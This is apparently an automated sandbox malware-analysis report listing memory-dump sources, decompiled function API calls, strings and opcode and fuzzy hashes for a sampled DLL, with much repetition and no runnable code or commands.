                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                          • String ID: invalid string position$string too long
                                                                                                          • API String ID: 2168136238-4289949731
                                                                                                          • Opcode ID: 8aa17d71e35fa552f01d26b1e2b3d1e7fb43937922b7673b2dfa5e2eb8cea720
                                                                                                          • Instruction ID: 38b16f55a3cd45c2dd301f76f842683293c7e02fd0eb7816c3377f19ec6f9969
                                                                                                          • Opcode Fuzzy Hash: 8aa17d71e35fa552f01d26b1e2b3d1e7fb43937922b7673b2dfa5e2eb8cea720
                                                                                                          • Instruction Fuzzy Hash: EB51C633B091269BD724CE5CD980B5EB3EBEBC9718B609A1EE855C7384D770EC408B91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F051B20 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 154libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6F051C5E
                                                                                                          • LoadLibraryW.KERNEL32(User32.dll,?,00000000,?,?,?,?,?,?,?,?), ref: 6F051C69
                                                                                                          • GetProcAddress.KERNEL32(00000000,F1F2E532), ref: 6F051CA2
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6F051CC1
                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll,?,00000000), ref: 6F051CCC
                                                                                                          • GetProcAddress.KERNEL32(00000000,EFF3E52B), ref: 6F051D0A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                          • String ID: User32.dll$kernel32.dll
                                                                                                          • API String ID: 310444273-1965990335
                                                                                                          • Opcode ID: dc836c60fff3ec6bafbd84d7685178f9a3bbde74e17340ea59f1d36e979e397c
                                                                                                          • Instruction ID: de458c00e9813dcf97c12a3bed35be1d27cbbfa3f22c71b9d984ac3715874e7a
                                                                                                          • Opcode Fuzzy Hash: dc836c60fff3ec6bafbd84d7685178f9a3bbde74e17340ea59f1d36e979e397c
                                                                                                          • Instruction Fuzzy Hash: 26613CB8604A009FD724CF18C6C1B6BBBF2FF45710F60895CD4968BA42D776E866CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F036D40 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 136COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • _rand.LIBCMT ref: 6F036DEA
                                                                                                            • Part of subcall function 6F089E0C: __getptd.LIBCMT ref: 6F089E0C
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036E17
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F036E2C
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036E3B
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F036E50
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C04
                                                                                                            • Part of subcall function 6F089BB5: std::exception::exception.LIBCMT ref: 6F089C1E
                                                                                                            • Part of subcall function 6F089BB5: __CxxThrowException@8.LIBCMT ref: 6F089C2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
                                                                                                          • String ID: 0Bo$0Bo$0Bo
                                                                                                          • API String ID: 2791304714-1088187309
                                                                                                          • Opcode ID: 45942ac4f09116778e49f8ea87b8abf93c44234cc7d4f2862ae279b799127794
                                                                                                          • Instruction ID: 083d0596611fbef25d7b1b96c119cec74682bea8e1f9fc81c18d9213f2b605c5
                                                                                                          • Opcode Fuzzy Hash: 45942ac4f09116778e49f8ea87b8abf93c44234cc7d4f2862ae279b799127794
                                                                                                          • Instruction Fuzzy Hash: C75129B6904748AFCB10CF58C880B9AFBF4FB19714F40856EE86A97B81D775E504CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F094409 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • UnDecorator::getArgumentList.LIBCMT ref: 6F09442E
                                                                                                            • Part of subcall function 6F093FC9: Replicator::operator[].LIBCMT ref: 6F09404C
                                                                                                            • Part of subcall function 6F093FC9: DName::operator+=.LIBCMT ref: 6F094054
                                                                                                          • DName::operator+.LIBCMT ref: 6F094487
                                                                                                          • DName::DName.LIBCMT ref: 6F0944DF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                          • API String ID: 834187326-2211150622
                                                                                                          • Opcode ID: 8c28eae6b06117c2848708f77728f3cead5df3396b4d798b24ae910e90e5bc89
                                                                                                          • Instruction ID: 4c435993f0772becfa0b1ffd4e2f4d4e7b1f82187e8663f93186d14c04d7b5eb
                                                                                                          • Opcode Fuzzy Hash: 8c28eae6b06117c2848708f77728f3cead5df3396b4d798b24ae910e90e5bc89
                                                                                                          • Instruction Fuzzy Hash: 522180B4A00548AFCB06CF58C540BAD7BF8FB4639AB04E195E899DF256D731E903EB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F095D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • UnDecorator::UScore.LIBCMT ref: 6F095D40
                                                                                                          • DName::DName.LIBCMT ref: 6F095D4C
                                                                                                            • Part of subcall function 6F093B3B: DName::doPchar.LIBCMT ref: 6F093B6C
                                                                                                          • UnDecorator::getScopedName.LIBCMT ref: 6F095D8B
                                                                                                          • DName::operator+=.LIBCMT ref: 6F095D95
                                                                                                          • DName::operator+=.LIBCMT ref: 6F095DA4
                                                                                                          • DName::operator+=.LIBCMT ref: 6F095DB0
                                                                                                          • DName::operator+=.LIBCMT ref: 6F095DBD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                          • String ID: void
                                                                                                          • API String ID: 1480779885-3531332078
                                                                                                          • Opcode ID: 25f016ee70100f6a45373cb6486a0b75858fac8c381f79545af74cdc8693232f
                                                                                                          • Instruction ID: 041378c123c250c8f103e9db8be0daaa710d940053c71d9f23d89164658a71c7
                                                                                                          • Opcode Fuzzy Hash: 25f016ee70100f6a45373cb6486a0b75858fac8c381f79545af74cdc8693232f
                                                                                                          • Instruction Fuzzy Hash: C211C274901248AFD705CB6CC99ABFD7BF49F0530AF006099D459AB2E1FB70AA46DB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F02FC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,F6D10407), ref: 6F02FC98
                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,F6D10407), ref: 6F02FCAD
                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,F6D10407), ref: 6F02FCB7
                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,F6D10407), ref: 6F02FCBA
                                                                                                          • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,F6D10407), ref: 6F02FD01
                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,F6D10407), ref: 6F02FD14
                                                                                                          • GetLastError.KERNEL32(?,?,00000000,F6D10407), ref: 6F02FD2A
                                                                                                          • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,F6D10407), ref: 6F02FD6B
                                                                                                          • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,F6D10407), ref: 6F02FD98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1303881157-0
                                                                                                          • Opcode ID: c120bf65ead1c373f8e1a1419a8790e2d4a0ba44306348b92e8f41c2caa48359
                                                                                                          • Instruction ID: b50a6691606944d9ad6d987d69e0e588bf4db8a235501732ce11a070446bcaa2
                                                                                                          • Opcode Fuzzy Hash: c120bf65ead1c373f8e1a1419a8790e2d4a0ba44306348b92e8f41c2caa48359
                                                                                                          • Instruction Fuzzy Hash: 0A51E4B5704701ABDB008F38DD84B5A77E9AF493A1F248699EC14CF2C6DB70E8118BB0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0842B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6F0842DD
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F0890ED
                                                                                                            • Part of subcall function 6F0890D8: __CxxThrowException@8.LIBCMT ref: 6F089102
                                                                                                            • Part of subcall function 6F0890D8: std::exception::exception.LIBCMT ref: 6F089113
                                                                                                          • _memmove.LIBCMT ref: 6F084363
                                                                                                          • _memmove.LIBCMT ref: 6F084381
                                                                                                          • _memmove.LIBCMT ref: 6F0843E6
                                                                                                          • _memmove.LIBCMT ref: 6F084453
                                                                                                          • _memmove.LIBCMT ref: 6F084474
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                          • String ID: vector<T> too long
                                                                                                          • API String ID: 4034224661-3788999226
                                                                                                          • Opcode ID: 1240086901d1678ba941062890547e53cbc243641eb484ed59c4e2dd5f445fc7
                                                                                                          • Instruction ID: 38b73c0a43f3c5b15ad129360ff78ac2c2679920ad4735124cdc23f0f5ac00aa
                                                                                                          • Opcode Fuzzy Hash: 1240086901d1678ba941062890547e53cbc243641eb484ed59c4e2dd5f445fc7
                                                                                                          • Instruction Fuzzy Hash: 865192B57043069FCB18CF68DD85A6BB7E9EBD8218F144A2DF856C3344E671F904CAA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F054B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                          • String ID: invalid string position$string too long
                                                                                                          • API String ID: 2168136238-4289949731
                                                                                                          • Opcode ID: 6340780fa2cb94bb20cdf408875343230aa1a39c60b58ed7fac11397241ced3c
                                                                                                          • Instruction ID: dd594acc2fc994704171fa57ea6c8e3f1a78ffea6f09b9b520cea1dabfbdc595
                                                                                                          • Opcode Fuzzy Hash: 6340780fa2cb94bb20cdf408875343230aa1a39c60b58ed7fac11397241ced3c
                                                                                                          • Instruction Fuzzy Hash: 6F41D676304200EBE724CE6CDAA0B9EF7E9FBD5614B900A1FE051C7684C7A1ECA58761
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F03FFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RSDi
                                                                                                          • API String ID: 4225690600-559181253
                                                                                                          • Opcode ID: 36f4df71e110002901d88860ae15305ee3373dfb0fd7e03ce616c4c881f281a5
                                                                                                          • Instruction ID: bccf1e778591c59410aeb037f34156839b5dda856a5e8f4486f989d8e8906ac7
                                                                                                          • Opcode Fuzzy Hash: 36f4df71e110002901d88860ae15305ee3373dfb0fd7e03ce616c4c881f281a5
                                                                                                          • Instruction Fuzzy Hash: A9410B74A01614DFDB00DFA9CD80B9AB7F9AF89300F60859AE519EB355DB31E941CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDestroySafe
                                                                                                          • String ID: RSUa
                                                                                                          • API String ID: 4225690600-2086061799
                                                                                                          • Opcode ID: 7745afb02cef6d107832ec8e3d051f1f161a3b11505ec4f21a91717a5a4edcc4
                                                                                                          • Instruction ID: 45d34489053f93209c5cc36f9691981fc3500ea4471586d99b17043049270f51
                                                                                                          • Opcode Fuzzy Hash: 7745afb02cef6d107832ec8e3d051f1f161a3b11505ec4f21a91717a5a4edcc4
                                                                                                          • Instruction Fuzzy Hash: E7311770E00618DFDB00DB69C980B9EB7F9AF89300F20859AE518E7251DB75E981CF50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F040787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423B3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423C3
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423D6
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423E9
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F0423FC
                                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6F04240F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
